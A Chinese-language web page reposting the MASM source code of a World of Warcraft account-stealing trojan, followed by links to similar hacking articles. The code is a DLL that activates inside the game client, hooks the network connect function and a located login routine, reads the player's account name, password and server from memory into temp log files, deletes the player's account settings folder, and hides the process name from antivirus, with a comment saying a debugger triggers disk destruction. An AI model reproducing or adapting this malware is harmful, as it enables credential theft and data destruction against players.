|
[推荐]美服,欧服WOW木马核心源代码,游戏版本v2.4.3.8606
| 以下是引用片段: ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; ; Programmed by asm, MSN:asm32@live.cn ; ; WOWGameMaker For WOW_MF_OF ; ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; ;0041DAEA |. 5E pop esi <-------------特征码位置+12=断点位置 ;0041DAEB |. 33CD xor ecx, ebp ;0041DAED |. 5B pop ebx ;0041DAEE |. E8 E7CAFEFF call 0040A5DA ;0041DAF3 |. 8BE5 mov esp, ebp ;0041DAF5 |. 5D pop ebp <-------------断点位置 ;0041DAF6 \. C2 0400 retn 4 <-------------ret执行后,游戏会跳转到005B55B4h这里执行。因此在木马里要 ;搜索这个地址得特征码从而得到通用得地址,而不是直接采用硬编码 = =。再得到通用得地址后执行 mov eax,hJmpEip/jmp eax即可 ;szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h ;005B55B4 8B4D FC mov ecx, dword ptr [ebp-4] <-----------------得到要跳转的地址 ;005B55B7 5F pop edi ;005B55B8 5E pop esi ;005B55B9 |. 33CD xor ecx, ebp ;005B55BB |. 5B pop ebx ;005B55BC |. E8 1950E5FF call 0040A5DA ;005B55C1 8BE5 mov esp, ebp ;szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h ;---------------------------------------------------------------------------------------------------------------- .486 .model flat,stdcall option casemap:none include debug.inc include windows.inc include user32.inc includelib user32.lib include kernel32.inc includelib kernel32.lib include advapi32.inc includelib advapi32.lib include comctl32.inc includelib comctl32.lib include psapi.inc includelib psapi.lib IncludeLib Masm32.lib Include Masm32.inc include Shlwapi.inc includelib Shlwapi.lib include shell32.inc includelib shell32.lib include macros.inc includelib mylib.lib include wininet.inc includelib wininet.lib HOOKAPI struct a byte 0B8h PMyapi DWORD 0 d BYTE 0FFh e BYTE 0E0h HOOKAPI ends MODULEINFO struct lpBaseOfDll dword 0 SizeOfImage dword 0 EntryPoint dword 0 MODULEINFO ends F_STOP equ 0002h ;子程序声明 HookApi proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD HookApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD HookApiRecv proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD WriteApi proto :DWORD ,:DWORD,:DWORD,:DWORD WriteApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD MyHookFunToGetUserAndPass proto :DWORD ,:DWORD,:DWORD MyConnect proto :DWORD ,:DWORD,:DWORD;,:DWORD MyRecv proto :DWORD ,:DWORD,:DWORD,:DWORD GetApi proto :DWORD,:DWORD BakDll proto :DWORD,:DWORD AntiFileToRun proto c :DWORD BytePos proto c :DWORD,:DWORD,:DWORD,:DWORD,:DWORD LoadModuleEx proto c :DWORD GetModuleImageSize proto c :DWORD CaleHookPointerWOW proto c ExtractFileName proto c :DWORD ExtractFilePath proto c :DWORD ;已初始化数据 .data hInstance dd 0 WProcess dd 0 Papi1 DWORD ? Papi2 DWORD ? Papi3 DWORD ? WritBak1 HOOKAPI <> WritBak2 HOOKAPI <> ApiBak1 db 10 dup(?) ApiBak2 db 10 dup(?) DllName1 db "ws2_32.dll",0 ApiName1 db "connect",0 ApiName2 db "recv",0 ApiName3 db "hook",0 szWowprocess db "g&mpm",0 ;wow.exe加密 Dllbase1 DWORD ? NowDllbase1 DWORD ? NowDllbase2 DWORD ? dwTemp dd ? hAdress dd ? ;Dllbase2 DWORD ? ;NowDllbase2 DWORD ? hRecvBak dd ? hRecv dd ? szJmp db 0C2h,04h,00h,0cch,0cch,0cch,0cch ;恢复 szJmpRecv db 8Bh,0FFh,55h,8Bh,0ECh,83h,0ECh, 10h,53h,33h,0DBh,81h,3Dh, 28h,40h,0A3h,71h,56h,0Fh,84h, 5Eh,50h,00h,00h szWOWFmt db "wowu=%s&wowp=%s&wowf=%s",13,10,13,10,0 szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h szEbpEnter db 6Ah, 40h, 5Ah,01h,5Ch,0FAh, 12h,00h,0C7h, 16h,42h .data? hHook dd ? hHook1 dd ? hPid dd ? ;hHwnd dd ? WOWuser db 50 dup(?) WOWpwd db 50 dup(?) WOWpwd1 db 50 dup(?) WOWpwd2 db 50 dup(?) szText db 256 dup(?) szText1 db 256 dup(?) @szValue db 256 dup(?) szServer db 256 dup(?) szUserJiaoSe db 256 dup(?) ;程序代码段 hQQ dd ? hWnd dd ? QQpid dd ? hecx dd ? hedx dd ? hesp dd ? hebp dd ? hesi dd ? hebx dd ? hedi dd ? szWoWBak db 256 dup(?) szWoWBak1 db 256 dup(?) ThreadId6 DWORD ? szLevel db 20 dup(?) szFileName db 200 dup(?) szSendData db 256 dup(?) TempPath db 256 dup(?) hWnd1 dd ? hEnter dd ? hExeModule dd ? dwModuleSize dd ? hUserPassRealCode dd ? hICout dd ? hJmpEip dd ? WOWServer db 256 dup(?) szFu db 125 dup(?) stStartUp STARTUPINFO <> stProcInfo PROCESS_INFORMATION <> @dwSize dd ? szFind WIN32_FIND_DATA<?> szSend1 db 256 dup(?) szSend2 db 256 dup(?) hRecv1 DD ? hAddress dd ? szPlayerName db 260 dup (?) szPlayerName1 db 260 dup (?) hRecv2 dd ? hRecv3 dd ? hSend dd ? szBakSend db 20 dup(?) dwFolderCount dd ? dwOption dd ? .code include inNTSAPISHELL.asm ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;每次启动都要把目录先跟文件先清空。这样可以保证获取的等级是对应游戏账号得。 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _FindFileToDel proc _lpszPath local @stFindFile:WIN32_FIND_DATA local @hFindFile local @szPath[MAX_PATH]:byte ;用来存放“路径\” local @szSearch[MAX_PATH]:byte ;用来存放“路径\*.*” local @szFindFile[MAX_PATH]:byte ;用来存放“路径\找到的文件” pushad invoke lstrcpy,addr @szPath,_lpszPath ;******************************************************************** ; 在路径后面加上\*.* ;******************************************************************** @@: invoke lstrlen,addr @szPath lea esi,@szPath add esi,eax xor eax,eax mov al,’\’ .if byte ptr [esi-1] != al mov word ptr [esi],ax .endif invoke lstrcpy,addr @szSearch,addr @szPath invoke lstrcat,addr @szSearch,CTXT("*.*") ;******************************************************************** ; 寻找文件 ;******************************************************************** invoke FindFirstFile,addr @szSearch,addr @stFindFile .if eax != INVALID_HANDLE_VALUE mov @hFindFile,eax .repeat invoke lstrcpy,addr @szFindFile,addr @szPath invoke lstrcat,addr @szFindFile,addr @stFindFile.cFileName .if @stFindFile.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY .if @stFindFile.cFileName != ’.’ inc dwFolderCount invoke _FindFileToDel,addr @szFindFile ;继续找,从最后一个目录删除才可以。顺序不能调换 invoke RemoveDirectory,addr @szFindFile .endif .else invoke DeleteFile,addr @szFindFile ;是文件就删除 .endif invoke FindNextFile,@hFindFile,addr @stFindFile .until (eax == FALSE) || (dwOption & F_STOP) invoke FindClose,@hFindFile .endif popad ret _FindFileToDel endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;权限提升 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _EnablePrivilege proc szPriv:DWORD, bFlags:DWORD LOCAL hToken LOCAL tkp : TOKEN_PRIVILEGES invoke GetCurrentProcess mov edx, eax invoke OpenProcessToken, edx, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken invoke LookupPrivilegeValue, NULL, szPriv, addr tkp.Privileges.Luid mov tkp.PrivilegeCount, 1 xor eax, eax .if bFlags mov eax, SE_PRIVILEGE_ENABLED .endif mov tkp.Privileges.Attributes, eax invoke AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0 push eax invoke CloseHandle, hToken pop eax ret _EnablePrivilege endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _WriteFile proc _lpbuff:DWORD,lpfilepath:DWORD local @dwWritebyte1:DWORD local @hFiledaka,@dwWritedaka pushad invoke CreateFile,lpfilepath,GENERIC_WRITE or GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,\ 0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 mov @hFiledaka,eax invoke SetFilePointer,@hFiledaka,0,NULL,FILE_END invoke lstrlen,_lpbuff mov @dwWritedaka,eax invoke WriteFile,@hFiledaka,_lpbuff,@dwWritedaka,addr @dwWritebyte1,NULL invoke CloseHandle,@hFiledaka popad ret _WriteFile endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;DLL入口点 DllEntry proc hInst:HINSTANCE, reason:DWORD, reserved1:DWORD .if reason==DLL_PROCESS_ATTACH ;当DLL加载时产生此事件 push hInst pop hInstance invoke RtlZeroMemory,addr szText,256 invoke GetModuleFileName,NULL,addr szText,256 invoke ExtractFileName,addr szText invoke wsprintf,addr szFileName,CTXT("%s"),eax invoke EncryptString,addr szWowprocess ;解密wow.exe过麦咖啡 invoke CompareString,LOCALE_USER_DEFAULT, NORM_IGNORECASE,addr szFileName, -1,addr szWowprocess, -1;如果是wow,则hook .if eax == 2 invoke OutputDebugString,CTXT("found....") invoke LoadModuleEx,NULL mov hExeModule,eax invoke GetModuleImageSize,hExeModule mov dwModuleSize,eax invoke BytePos,hExeModule, dwModuleSize,addr szUserPassRealCode,sizeof szUserPassRealCode,hICout ;搜索特征码的位置 .if eax == -1 invoke OutputDebugString,CTXT("search error") .endif mov hUserPassRealCode,eax mov eax,hExeModule add hUserPassRealCode,eax ;特征码的位置 add hUserPassRealCode,12 ;得到实际断点位置 invoke BytePos,hExeModule, dwModuleSize,addr szJmpEip,sizeof szJmpEip,hICout ;要跳转的位置。 .if eax == -1 invoke OutputDebugString,CTXT("jmp eip code search error") .endif mov hJmpEip,eax mov eax,hExeModule add hJmpEip,eax invoke GetCurrentProcess ;取进程伪句柄 mov WProcess ,eax invoke BakDll,addr DllName1,addr Dllbase1 ;备份"kernel32.dll" mov NowDllbase1,eax invoke HookApi1,addr DllName1,addr ApiName3,addr Papi1,addr MyHookFunToGetUserAndPass,addr ApiBak1,addr WritBak1 ;HOOK 0041DAEE 这个地址得到用户跟密码 invoke HookApi,addr DllName1,addr ApiName1,addr Papi2,addr MyConnect,addr ApiBak2,addr WritBak2 ;HOOK connect ;invoke HookApiRecv,addr DllName1,addr ApiName2,addr Papi3,addr MyRecv,addr ApiBak2,addr WritBak2 ;HOOK recv invoke GetApi,addr DllName1,CTXT("send") ;得到send函数地址 mov hSend,eax invoke ReadProcessMemory,WProcess,hSend,addr szBakSend,20,NULL ;备份send函数20字节 call kernel32_IsDebuggerPresent ;反调式。如果发现dll被调式,则摧毁硬盘。 invoke CreateThread,NULL,0,addr _Anti,NULL,0,addr ThreadId invoke CreateThread,NULL,0,addr _GetWowGameLevel,NULL,0,addr ThreadId1 .endif .endif .if reason==DLL_PROCESS_DETACH ;当卸载的时候 .endif mov eax,TRUE ret DllEntry Endp ;**************************************************************** GetMsgProc proc nCode:DWORD,wParam:DWORD,lParam:DWORD invoke CallNextHookEx,hHook,nCode,wParam,lParam mov eax,TRUE ret GetMsgProc endp ;--------------------------------------------------------------------- InstallHook proc dwProcessId:dword push dwProcessId pop hPid ;invoke SetWindowsHookEx,WH_GETMESSAGE,addr GetMsgProc,hInstance,NULL mov hHook,eax ret InstallHook endp UninstallHook proc invoke UnhookWindowsHookEx,hHook push eax invoke WriteApi,WProcess,Papi1, addr ApiBak1 ,8 ;还原API pop eax ret UninstallHook endp ;***************************************************************** GetApi proc DllNameAddress:DWORD,ApiNameAddress:DWORD invoke GetModuleHandle,DllNameAddress ;取DLL模块句柄 .if eax==NULL invoke LoadLibrary ,DllNameAddress ;加载DLL .endif invoke GetProcAddress,eax,ApiNameAddress ;取API地址 mov hAdress,eax mov eax,hAdress ret GetApi endp ;*********************************下面是核心部分***************** HookApiRecv proc DllName:dword,ApiName:dword ,Papi:dword , MyApi:dword ,ApiBak:dword ,WritBak:dword LOCAL ApiDz invoke GetApi,DllName,ApiName ;取API地址 .if eax==0 ret .endif mov hAdress,eax invoke lstrcmp,ApiName,CTXT("recv");如果是recv,则hook的地址是 recv的地址。 .if eax == NULL ;connect ? push hAdress pop ApiDz ;下面几行是保存API地址 invoke wsprintf,addr szText,CTXT("Recv address:0x%x"),ApiDz invoke OutputDebugString,addr szText .endif mov eax,Papi assume eax:ptr push ApiDz pop [eax] invoke ReadProcessMemory,WProcess,ApiDz,ApiBak,8,NULL ;备份原API的前8字节 .if eax==0 ret .endif mov eax,WritBak assume eax:ptr HOOKAPI push MyApi pop [eax].PMyapi ;要替代API的函数地址 .if [eax].PMyapi == 0 mov eax,0 ret .endif invoke WriteApi,WProcess,ApiDz, WritBak ,size HOOKAPI ;HOOK API ret HookApiRecv endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HookApi proc DllName:dword,ApiName:dword ,Papi:dword , MyApi:dword ,ApiBak:dword ,WritBak:dword LOCAL ApiDz invoke GetApi,DllName,ApiName ;取API地址 .if eax==0 ret .endif mov hAdress,eax invoke lstrcmp,ApiName,CTXT("connect") .if eax == NULL ;connect ? push hAdress pop ApiDz ;下面几行是保存API地址 invoke wsprintf,addr szText,CTXT("connect address:0x%x"),ApiDz invoke OutputDebugString,addr szText .endif mov eax,Papi assume eax:ptr push ApiDz pop [eax] invoke ReadProcessMemory,WProcess,ApiDz,ApiBak,8,NULL ;备份原API的前8字节 .if eax==0 ret .endif mov eax,WritBak assume eax:ptr HOOKAPI push MyApi pop [eax].PMyapi ;要替代API的函数地址 .if [eax].PMyapi == 0 mov eax,0 ret .endif invoke WriteApi,WProcess,ApiDz, WritBak ,size HOOKAPI ;HOOK API ret HookApi endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HookApi1 proc DllName:dword,ApiName:dword ,Papi:dword , MyApi:dword ,ApiBak:dword ,WritBak:dword LOCAL ApiDz invoke lstrcmp,ApiName,CTXT("hook") .if eax == NULL mov eax,hUserPassRealCode mov ApiDz,eax .endif invoke wsprintf,addr szText,CTXT("myhook address:0x%x"),ApiDz invoke OutputDebugString,addr szText mov eax,Papi assume eax:ptr push ApiDz pop [eax] invoke ReadProcessMemory,WProcess,ApiDz,ApiBak,8,NULL ;备份原API的前8字节 .if eax==0 ret .endif mov eax,WritBak assume eax:ptr HOOKAPI push MyApi pop [eax].PMyapi ;要替代API的函数地址 .if [eax].PMyapi == 0 mov eax,0 ret .endif invoke WriteApi,WProcess,ApiDz, WritBak ,size HOOKAPI ;HOOK API ret HookApi1 endp ;------------------------------------------------------------------ ;WriteApi修改内存 ;------------------------------------------------------------------ WriteApi proc Process:DWORD ,Papi:DWORD,Ptype:DWORD,Psize:DWORD LOCAL mbi:MEMORY_BASIC_INFORMATION LOCAL msize:DWORD ;返回页面虚拟信息 invoke VirtualQueryEx,Process, Papi,addr mbi,SIZEOF MEMORY_BASIC_INFORMATION ;修改为可读写模式 invoke VirtualProtectEx,Process, mbi.BaseAddress,8h,PAGE_EXECUTE_READWRITE,addr mbi.Protect ;开始写内存 invoke WriteProcessMemory,Process, Papi, Ptype,Psize ,NULL PUSH eax ;改回只读模式 invoke VirtualProtectEx,Process,mbi.BaseAddress,8h,PAGE_EXECUTE_READ,addr mbi.Protect pop eax ret WriteApi endp ;------------------------------------------------------------------ ;hook掉Connect函数 ;------------------------------------------------------------------ MyRecv proc dwDesiredAccess:DWORD ,bInheritHandle:DWORD ,dwProcessId:DWORD, Flg:DWORD LOCAL NowApiBase mov eax,Papi3 ;hook新函数,这里要声明 sub eax,Dllbase1 add eax,NowDllbase1 mov NowApiBase,eax push Flg push dwProcessId push bInheritHandle push dwDesiredAccess call NowApiBase ret MyRecv endp ;******************************************************************* MyConnect proc dwDesiredAccess:DWORD ,bInheritHandle:DWORD ,dwProcessId:DWORD;, Flg:DWORD LOCAL NowApiBase mov eax,Papi2 sub eax,Dllbase1 add eax,NowDllbase1 mov NowApiBase,eax INVOKE RtlZeroMemory,ADDR szText1,SIZEOF szText1 INVOKE wsprintf,addr szText1,CTXT("connect inCunt:%d"),hRecv invoke OutputDebugString,addr szText1 .if hRecv1 == 1 ;断connect函数是为了防止第一次输入错误密码再次输入的时候截不到的问题。再次调用connect的时候,就说明再次输入密码,因此要再次hook。也就是错误密码不被写入 invoke HookApi1,addr DllName1,addr ApiName3,addr Papi1,addr MyHookFunToGetUserAndPass,addr ApiBak1,addr WritBak1 ;HOOK 0041DAEE 这个地址得到用户跟密码 mov hRecv1,0 .endif push dwProcessId push bInheritHandle push dwDesiredAccess call NowApiBase ret MyConnect endp ;------------------------------------------------------------------ ;获取密码函数 ;------------------------------------------------------------------ ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; ; Programmed by asm, MSN:asm32@live.cn ; ; WOWGameMaker For WOW_MF_OF ; ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; MyHookFunToGetUserAndPass proc dwDesiredAccess:DWORD ,bInheritHandle:DWORD ,dwProcessId:DWORD local NowApiBase local @dwSize1 LOCAL finddata:WIN32_FIND_DATA LOCAL finddata1:WIN32_FIND_DATA local hFindFile,hFindFile1 invoke RtlZeroMemory,addr WOWpwd,sizeof WOWpwd invoke ReadProcessMemory,WProcess,ebx,addr WOWpwd,sizeof WOWpwd,NULL invoke RtlZeroMemory,addr WOWuser,sizeof WOWuser invoke ReadProcessMemory,WProcess,edi,addr WOWuser,sizeof WOWuser,NULL invoke ReadProcessMemory,WProcess,0088F9C8h,addr WOWServer,sizeof WOWServer,NULL invoke RtlZeroMemory,addr TempPath,256 invoke GetTempPath,256,addr TempPath invoke lstrcat,addr TempPath,CTXT("fmt.log") invoke DeleteFile,addr TempPath invoke RtlZeroMemory,addr szSendData,256 invoke wsprintf,addr szSendData,addr szWOWFmt,addr WOWuser,addr WOWpwd,addr WOWServer invoke _WriteFile,addr szSendData,addr TempPath invoke RtlZeroMemory,addr TempPath,256 invoke GetTempPath,256,addr TempPath invoke lstrcat,addr TempPath,CTXT("fmttemp.log") invoke DeleteFile,addr TempPath invoke _WriteFile,addr WOWuser,addr TempPath mov @dwSize,sizeof @szValue invoke _RegQueryValue,CTXT("SOFTWARE\Blizzard Entertainment\World of Warcraft"),CTXT("InstallPath"),addr @szValue,addr @dwSize,CTXT("REG_SZ") ;得到WOW安装路径 invoke lstrcat,addr @szValue,CTXT("WTF\Account\") invoke lstrcat,addr @szValue,addr WOWuser invoke _FindFileToDel,addr @szValue ;清空当前用户下的所有文件跟子目录 invoke WriteProcessMemory,WProcess,hUserPassRealCode,addr szJmp,7,addr dwTemp MOV hRecv1,1 invoke WriteProcessMemory,WProcess,hSend,addr szBakSend,20,NULL ;恢复send函数20字节 add ebp,5ch mov eax,hJmpEip jmp eax ret MyHookFunToGetUserAndPass endp ;------------------------------------------------------------------ ;备份dll函数 ;------------------------------------------------------------------ BakDll proc DllName:DWORD,Dllbase:DWORD LOCAL ModuleHwnd,hMainHeap,lpBuffer LOCAL ModuleInformation: MODULEINFO invoke GetModuleHandle,DllName mov ModuleHwnd,eax .if ModuleHwnd==0 ret .endif invoke GetModuleInformation,WProcess,ModuleHwnd,addr ModuleInformation,size MODULEINFO .if eax ==0 jmp UninstallHook ret .endif ;原DLL的基地址 mov eax,Dllbase assume eax:ptr push ModuleInformation.lpBaseOfDll pop [eax] invoke VirtualAlloc, 0,ModuleInformation.SizeOfImage,4096,PAGE_EXECUTE_READWRITE mov lpBuffer,eax .if lpBuffer==0 jmp UninstallHook ret .endif ;备份DLL invoke WriteProcessMemory,WProcess,lpBuffer, ModuleInformation.lpBaseOfDll,ModuleInformation.SizeOfImage,0 .if eax==0 jmp UninstallHook ret .endif mov eax,lpBuffer ret BakDll endp ;******************************************************************* End DllEntry |
| 网游盗号木马实现手记 | 01-09 |
| 黑色技术蠕虫下载者[完整源码] | 11-01 |
| 利用BCB自己打造QQ炸弹 | 10-23 |
| 从内存中加载并启动一个exe(delp | 09-27 |
| 开启和关闭Windows xp 防火墙(de | 09-27 |
| 让你的程序通过XP防火墙(delphi编 | 09-27 |
| 如何让你的程序安全通过windows防 | 08-20 |
| 如何透过程序来控制 Windows (XP | 08-20 |
| 动易2005-2006算号器的源代码 | 08-11 |
| API对注册表进行操作(Delphi编程 | 07-30 |
| 一段隐藏注册表项的代码 | 07-26 |
| 了解VB编写病毒的大体方法 | 07-02 |
您现在的位置: